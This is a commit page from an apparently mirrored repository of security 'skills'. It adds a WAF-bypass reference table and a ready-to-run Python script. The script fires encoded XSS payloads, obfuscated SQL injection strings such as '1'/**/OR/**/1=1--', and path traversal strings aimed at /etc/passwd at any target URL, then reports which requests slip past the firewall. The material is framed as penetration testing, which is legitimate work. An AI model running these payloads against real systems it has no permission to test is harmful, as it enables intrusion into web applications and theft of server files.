mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-18 21:49:40 +03:00
Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills
Complete skill folder anatomy across all cybersecurity skills: - scripts/agent.py: 80-150 line Python agents using real libraries (impacket, boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.) - references/api-reference.md: real API documentation with method signatures - LICENSE: MIT license for all skill folders
This commit is contained in:
@@ -0,0 +1,21 @@
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2025 Anthropic Agent Skills Contributors
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
@@ -0,0 +1,53 @@
|
||||
# API Reference: WAF Bypass Testing
|
||||
|
||||
## Encoding Bypass Techniques
|
||||
|
||||
| Technique | Example | Description |
|
||||
|-----------|---------|-------------|
|
||||
| URL Encoding | `%3Cscript%3E` | Single URL encode |
|
||||
| Double Encoding | `%253Cscript%253E` | Double URL encode |
|
||||
| Unicode/Fullwidth | `\uff1cscript\uff1e` | Unicode replacement |
|
||||
| HTML Entities | `<script>` | Hex HTML entities |
|
||||
| Null Byte | `%00` insertion | Terminate string parsing |
|
||||
| Tab/Newline | `scr\tipt` | Whitespace insertion |
|
||||
|
||||
## SQLi WAF Bypass Techniques
|
||||
|
||||
| Technique | Payload Pattern |
|
||||
|-----------|----------------|
|
||||
| Inline Comment | `1'/**/OR/**/1=1--` |
|
||||
| Version Comment | `1'/*!50000OR*/1=1--` |
|
||||
| Case Variation | `1' oR 1=1--` |
|
||||
| Hex Encoding | `0x313d31` |
|
||||
| Buffer Overflow | Long padding before payload |
|
||||
| Content-Type Switch | Send as `application/json` |
|
||||
|
||||
## HTTP Method Bypass
|
||||
|
||||
| Method | WAF Behavior |
|
||||
|--------|-------------|
|
||||
| GET/POST | Usually inspected |
|
||||
| PUT/PATCH/DELETE | Often not inspected |
|
||||
| OPTIONS | Typically bypasses rules |
|
||||
|
||||
## WAF Detection Indicators
|
||||
|
||||
| Response | Meaning |
|
||||
|----------|---------|
|
||||
| 403 Forbidden | Request blocked by WAF |
|
||||
| 406 Not Acceptable | Content rejected |
|
||||
| 429 Too Many Requests | Rate limited |
|
||||
| Custom error page | WAF vendor-specific block |
|
||||
|
||||
## Python Libraries
|
||||
|
||||
| Library | Version | Purpose |
|
||||
|---------|---------|---------|
|
||||
| `requests` | >=2.28 | HTTP request sending |
|
||||
| `urllib.parse` | stdlib | URL encoding/double encoding |
|
||||
|
||||
## References
|
||||
|
||||
- OWASP WAF Bypass: https://owasp.org/www-community/attacks/WAF_Bypass
|
||||
- PortSwigger WAF Bypass: https://portswigger.net/web-security/essential-skills/obfuscating-attacks-using-encodings
|
||||
- PayloadsAllTheThings WAF: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/WAF%20Bypass
|
||||
@@ -0,0 +1,144 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Agent for testing WAF bypass techniques.
|
||||
|
||||
Sends encoded, obfuscated, and protocol-level bypass payloads
|
||||
against a target URL to identify WAF evasion weaknesses in
|
||||
XSS, SQLi, and path traversal filtering.
|
||||
"""
|
||||
|
||||
import requests
|
||||
import json
|
||||
import sys
|
||||
import urllib.parse
|
||||
from datetime import datetime
|
||||
|
||||
|
||||
class WAFBypassAgent:
|
||||
"""Tests web application firewall bypass techniques."""
|
||||
|
||||
def __init__(self, target_url):
|
||||
self.target_url = target_url
|
||||
self.session = requests.Session()
|
||||
self.findings = []
|
||||
|
||||
def _send(self, payload, param="q", method="GET", headers=None):
|
||||
try:
|
||||
if method == "GET":
|
||||
resp = self.session.get(
|
||||
self.target_url, params={param: payload},
|
||||
headers=headers or {}, timeout=10, allow_redirects=False)
|
||||
else:
|
||||
resp = self.session.post(
|
||||
self.target_url, data={param: payload},
|
||||
headers=headers or {}, timeout=10, allow_redirects=False)
|
||||
return {"status": resp.status_code, "length": len(resp.text),
|
||||
"blocked": resp.status_code in (403, 406, 429, 501)}
|
||||
except requests.RequestException as exc:
|
||||
return {"error": str(exc)}
|
||||
|
||||
def test_encoding_bypasses(self, base_payload="<script>alert(1)</script>"):
|
||||
"""Test URL encoding, double encoding, and Unicode bypasses."""
|
||||
encodings = {
|
||||
"plain": base_payload,
|
||||
"url_encoded": urllib.parse.quote(base_payload),
|
||||
"double_encoded": urllib.parse.quote(urllib.parse.quote(base_payload)),
|
||||
"hex_entities": "".join(f"&#x{ord(c):02x};" for c in base_payload),
|
||||
"unicode_fullwidth": base_payload.replace("<", "\uff1c").replace(">", "\uff1e"),
|
||||
"null_byte": base_payload[:7] + "%00" + base_payload[7:],
|
||||
"tab_insert": base_payload.replace("script", "scr\tipt"),
|
||||
"newline_insert": base_payload.replace("script", "scr\nipt"),
|
||||
}
|
||||
results = []
|
||||
for name, payload in encodings.items():
|
||||
resp = self._send(payload)
|
||||
bypassed = not resp.get("blocked", True) and not resp.get("error")
|
||||
if bypassed:
|
||||
self.findings.append({"type": "Encoding Bypass", "technique": name,
|
||||
"severity": "High"})
|
||||
results.append({"technique": name, "blocked": resp.get("blocked"),
|
||||
"status": resp.get("status")})
|
||||
return results
|
||||
|
||||
def test_sqli_bypasses(self):
|
||||
"""Test SQL injection WAF bypass techniques."""
|
||||
payloads = {
|
||||
"inline_comment": "1'/**/OR/**/1=1--",
|
||||
"version_comment": "1'/*!50000OR*/1=1--",
|
||||
"case_variation": "1' oR 1=1--",
|
||||
"concat_function": "1' OR CONCAT(0x31)=1--",
|
||||
"hex_encoding": "1' OR 0x313d31--",
|
||||
"scientific_notation": "1' OR 1e0=1e0--",
|
||||
"buffer_overflow": "1' OR " + "A" * 5000 + " 1=1--",
|
||||
"json_content_type": "1' OR '1'='1",
|
||||
}
|
||||
results = []
|
||||
for name, payload in payloads.items():
|
||||
headers = {"Content-Type": "application/json"} if name == "json_content_type" else {}
|
||||
resp = self._send(payload, method="POST", headers=headers)
|
||||
bypassed = not resp.get("blocked", True) and not resp.get("error")
|
||||
if bypassed:
|
||||
self.findings.append({"type": "SQLi WAF Bypass", "technique": name,
|
||||
"severity": "Critical"})
|
||||
results.append({"technique": name, "blocked": resp.get("blocked"),
|
||||
"status": resp.get("status")})
|
||||
return results
|
||||
|
||||
def test_path_traversal_bypasses(self):
|
||||
"""Test path traversal WAF evasion."""
|
||||
payloads = {
|
||||
"dot_dot_slash": "../../../etc/passwd",
|
||||
"encoded_dots": "..%2f..%2f..%2fetc%2fpasswd",
|
||||
"double_encoded": "..%252f..%252f..%252fetc%252fpasswd",
|
||||
"utf8_encoding": "..%c0%af..%c0%afetc/passwd",
|
||||
"backslash": "..\\..\\..\\etc\\passwd",
|
||||
"null_byte_ext": "../../../etc/passwd%00.png",
|
||||
}
|
||||
results = []
|
||||
for name, payload in payloads.items():
|
||||
resp = self._send(payload, param="file")
|
||||
bypassed = not resp.get("blocked", True) and not resp.get("error")
|
||||
if bypassed:
|
||||
self.findings.append({"type": "Path Traversal Bypass",
|
||||
"technique": name, "severity": "High"})
|
||||
results.append({"technique": name, "blocked": resp.get("blocked"),
|
||||
"status": resp.get("status")})
|
||||
return results
|
||||
|
||||
def test_http_method_bypass(self):
|
||||
"""Test if WAF only inspects certain HTTP methods."""
|
||||
methods = ["GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS", "HEAD"]
|
||||
payload = "<script>alert(1)</script>"
|
||||
results = []
|
||||
for method in methods:
|
||||
try:
|
||||
resp = self.session.request(method, self.target_url,
|
||||
params={"q": payload}, timeout=10)
|
||||
results.append({"method": method, "status": resp.status_code,
|
||||
"blocked": resp.status_code in (403, 406, 429)})
|
||||
except requests.RequestException:
|
||||
results.append({"method": method, "error": "failed"})
|
||||
return results
|
||||
|
||||
def generate_report(self):
|
||||
report = {
|
||||
"target": self.target_url,
|
||||
"report_date": datetime.utcnow().isoformat(),
|
||||
"total_bypasses": len(self.findings),
|
||||
"findings": self.findings,
|
||||
}
|
||||
print(json.dumps(report, indent=2))
|
||||
return report
|
||||
|
||||
|
||||
def main():
|
||||
url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080/"
|
||||
agent = WAFBypassAgent(url)
|
||||
agent.test_encoding_bypasses()
|
||||
agent.test_sqli_bypasses()
|
||||
agent.test_path_traversal_bypasses()
|
||||
agent.test_http_method_bypass()
|
||||
agent.generate_report()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in New Issue
Block a user